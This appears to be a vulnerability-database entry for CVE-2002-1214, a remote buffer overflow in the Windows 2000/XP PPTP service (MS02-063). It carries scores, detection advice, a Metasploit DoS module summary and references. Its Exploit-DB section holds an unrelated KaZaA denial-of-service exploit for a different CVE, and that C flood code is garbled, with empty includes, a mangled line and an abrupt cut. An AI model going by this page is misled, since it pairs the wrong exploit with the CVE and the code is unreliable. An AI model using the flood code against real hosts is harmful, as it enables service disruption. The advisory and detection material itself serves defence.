CVE-2002-1214
Published 2002-10-28
Priority: P3 43 · high · 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 50.65% (98.8th percentile)
Buffer overflow in Microsoft PPTP Service on Windows XP and Windows 2000 allows remote attackers to cause a denial of service (hang) and possibly execute arbitrary code via a certain PPTP packet with malformed control data.
Detection & IOCs (extracted from sources)
- Detect malformed PPTP control data packets targeting Windows PPTP RAS servers (TCP/1723); abnormal PPTP Control Data packets can trigger a kernel buffer overflow resulting in a BSOD.
- Monitor for unexpected system hangs or BSODs on Windows 2000/XP hosts running PPTP RAS services following inbound PPTP connections.
- Affected platforms are limited to Windows 2000 SP0–SP3 and Windows XP SP0–SP1 running PPTP Remote Access Services; patched or later service-pack systems are not affected.
- The Metasploit module is auxiliary/DoS only; while arbitrary code execution may be theoretically possible, it has not been demonstrated by this module.
No detection rules found.
Exploit-DB
KaZaA Media Desktop 1.7.1 - Large Message Denial of Service (CVE-2002-2306)
exploitdb · 2002-07-25
---
// source: https://www.securityfocus.com/bid/5317/info
KaZaA may consume large amounts of CPU when processing a sequence of large messages. It is possible for an attacker to flood a vulnerable system with a large number of messages, resulting in a denial of service condition.
/*
kazaa denial of service attack
by Josh and omega
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 1214
int main(int argc, char *argv[])
{
int fd, numbytes, randnum, k;
struct hostent *host;
struct sockaddr_in them;
char buf2[4026];
char buf[5000];
char *bigboy;
int i, size, j;
memset(buf2, 'a', sizeof(buf2));
buf2[sizeof(buf2)-1]='\0';
srand(time(NULL));
if (argc \n", argv[0]);
exit(1)
Metasploit
MS02-063 PPTP Malformed Control Data Kernel Denial of Service
metasploit
This module exploits a kernel-based overflow when sending abnormal PPTP Control Data packets to Microsoft Windows 2000 SP0-3 and XP SP0-1 based PPTP RAS servers (Remote Access Services). Kernel memory is overwritten, resulting in a BSOD. Code execution may be possible; however, this module is only a DoS.
No writeups or analysis indexed.
References
- http://online.securityfocus.com/archive/1/293146
- http://www.iss.net/security_center/static/10199.php
- http://www.securityfocus.com/bid/5807
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2002/ms02-063
Published: 2002-10-28